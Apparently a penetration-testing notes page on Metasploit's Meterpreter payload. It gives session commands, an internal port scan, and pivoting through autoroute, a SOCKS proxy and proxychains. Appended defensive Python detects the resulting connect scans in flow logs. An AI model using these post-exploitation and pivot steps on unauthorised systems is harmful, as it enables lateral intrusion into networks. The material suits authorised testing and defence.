Meterpreter

Description

Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code. It is deployed using in-memory DLL injection, so it resides entirely in memory and writes nothing to disk. No new processes are created: Meterpreter injects itself into the compromised process, from which it can migrate to other running processes. As a result, the forensic footprint of an attack is very limited.

Usage

sessions -l 
sessions -u 1
sessions -i 1

background
CTRL + Z

use auxiliary/scanner/portscan/tcp
set RHOSTS 172.16.0.24
run

Pivot

sessions -i 1
ipconfig
run autoroute -s 172.16.0.0/24
use auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run

/etc/proxychains.conf

[ProxyList]
# add proxy here ...
socks4  127.0.0.1   9050

proxychains -q nmap -sT 172.16.0.24
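
Seen from the network, the scan routed through the session reaches 172.16.0.24 as ordinary full TCP connects (-sT) whose source is the compromised host, not the attacker's machine. The following is an added example, not part of the original notes, that flags that pattern in connection logs; the flow-record layout, the pivot address 172.16.0.10 and the thresholds are assumptions.

```python
from collections import defaultdict

# Constructed flow records (not from the page):
# (epoch_seconds, src_ip, dst_ip, dst_port, tcp_result)
# 172.16.0.10 is a hypothetical pivot host; 172.16.0.24 is the page's scan target.
SCANNED_PORTS = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445, 3306, 3389, 8080]
OPEN_PORTS = (22, 80, 445)
SAMPLE_FLOWS = [
    (1000 + i * 0.2, "172.16.0.10", "172.16.0.24", port,
     "ESTABLISHED" if port in OPEN_PORTS else "RST")
    for i, port in enumerate(SCANNED_PORTS)
] + [
    # Normal file-share and web traffic from other internal hosts.
    (1001.0, "172.16.0.30", "172.16.0.24", 445, "ESTABLISHED"),
    (1005.0, "172.16.0.30", "172.16.0.24", 445, "ESTABLISHED"),
    (1200.0, "172.16.0.31", "172.16.0.24", 80, "ESTABLISHED"),
]


def find_connect_scans(flows, window=60.0, min_ports=10, min_fail_ratio=0.5):
    """Flag (src, dst) pairs where src touches at least min_ports distinct
    ports on dst within `window` seconds and most attempts fail."""
    by_pair = defaultdict(list)
    for ts, src, dst, port, result in flows:
        by_pair[(src, dst)].append((ts, port, result))

    alerts = []
    for (src, dst), events in by_pair.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans <= window seconds.
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            ports = {port for _, port, _ in span}
            failed = sum(1 for _, _, result in span if result != "ESTABLISHED")
            if len(ports) >= min_ports and failed / len(span) >= min_fail_ratio:
                alerts.append({"src": src, "dst": dst,
                               "ports": len(ports), "first_seen": span[0][0]})
                break  # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for alert in find_connect_scans(SAMPLE_FLOWS):
        print(alert)
```

An alert on an internal source that is not a known scanner is a reason to examine that host's running processes and memory, since the payload leaves nothing on disk.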
